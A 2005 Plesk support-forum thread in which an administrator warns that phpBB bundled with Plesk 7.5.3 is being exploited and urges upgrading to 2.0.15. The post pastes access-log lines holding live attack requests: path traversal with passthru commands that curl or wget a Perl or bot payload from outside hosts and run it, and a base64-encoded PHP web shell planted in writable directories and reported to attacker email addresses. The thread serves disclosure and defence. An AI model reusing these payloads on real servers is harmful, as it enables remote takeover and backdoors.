1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice

Upgrade Phpbb Now!!! 2.0.15

Discussion in 'Plesk for Linux - 8.x and Older' started by tekmage, Jun 4, 2005.

  1. tekmage

    tekmage Guest

    0
     
    Folks, I've been fighting a battle for the last week or so. Some jack*ss script kiddy has been exploiting a hole in phpBB that ships with Plesk 7.5.3 and below.

    I just figured it out last night and I'd like to pass this on ASAP to everyone.

    Run, do not walk, to the phpBB.com site and download 2.0.15, then upgrade any and all sites you have using this software.

    Here is the exploit attempt in my access_logs, you might want to check through yours asap.

    [root@hydra root]# cat /home/httpd/vhosts/*/statistics/logs/access_log* | grep "%20/tmp"
    66.250.130.186 - - [29/May/2005:15:15:50 -0700] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=d86b9a329a43539c22cee9a07ab95fe2&niggaip=1&niggaport=1&nigga=passthru(%22cd%20/tmp;curl%20-C%20-%20http://uhoho.gratishost.com/a.pl%20%3E%20a.pl;perl%20a.pl%22); HTTP/1.1" 200 7926 "http://www.FOOOME.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


    216.57.216.163 - - [15/Jan/2005:05:40:59 -0800] "GET /classifiedweapon.htm&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20users.volja.net/kojpic/botek;wget%20users.volja.net/kojpic/botek;chmod%20777%20/tmp/botek;/tmp/botek;rm%20sess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 404 956 "-" "LWP::Simple/5.64"
    66.240.141.100 - - [02/May/2005:14:32:01 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=718da6c3e60b36417f1d9fa7ea918328&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"cp%20/tmp/.newminibd.php%20\".$cmd);mail(\"phpownz@imail.mohave.edu\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOO.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


    66.240.141.100 - - [02/May/2005:16:56:43 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=ba84ad1a6ff8287142b5f1b0adf0a753&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"mv%20/tmp/.newminibd.php%20\".$cmd);mail(\"buyown@idx82.idx.net\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOO.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    [root@hydra root]# 66.240.141.100 - - [02/May/2005:14:32:01 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=718da6c3e60b36417f1d9fa7ea918328&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"cp%20/tmp/.newminibd.php%20\".$cmd);mail(\"phpownz@imail.mohave.edu\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOOME.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


    If successful it installs a perl script into /tmp that is a udp flood exploit. The file is random name, but mostly it's called ret.pl

    I started sweeping any and all perl scripts from my /tmp every 3 mins, that didn't work, I then went down to 1 min.

    I tried securing my /tmp by moving it to a new partition, mounting noexec, nosuid. That did squat.

    Finally I was able to find that above in the access logs and figured out that it was phpBB. I failed at my first attempt to patch it, and got nailed again that night. So I have blown away any and all old copies and started with a fresh 2.0.15 build on all sites using phpBB.

    http://www.phpbb.com/downloads.php


    Also note the two above trigger email addresses.

    buyown@idx82.idx.net

    and

    phpownz@imail.mohave.edu

    You might want to black list those.. I have.

    I'm hoping that this works.. Let me know if you've had simular issues..

    Best,

    -=Dave
     
  2. Outlaw

    Outlaw Guest

    0
     
    I dont use a program of the plesk package, because the originals are newer and I don´t need for every program an extra data base ....

    About phpbb: I have disabled this from the application list for my users and with the newsletter of phpbb I get infos about fixes and new versions when they are available and not when someone has manipulated it on my server ....

    The .15 Version is a few weeks old ....
     
Loading...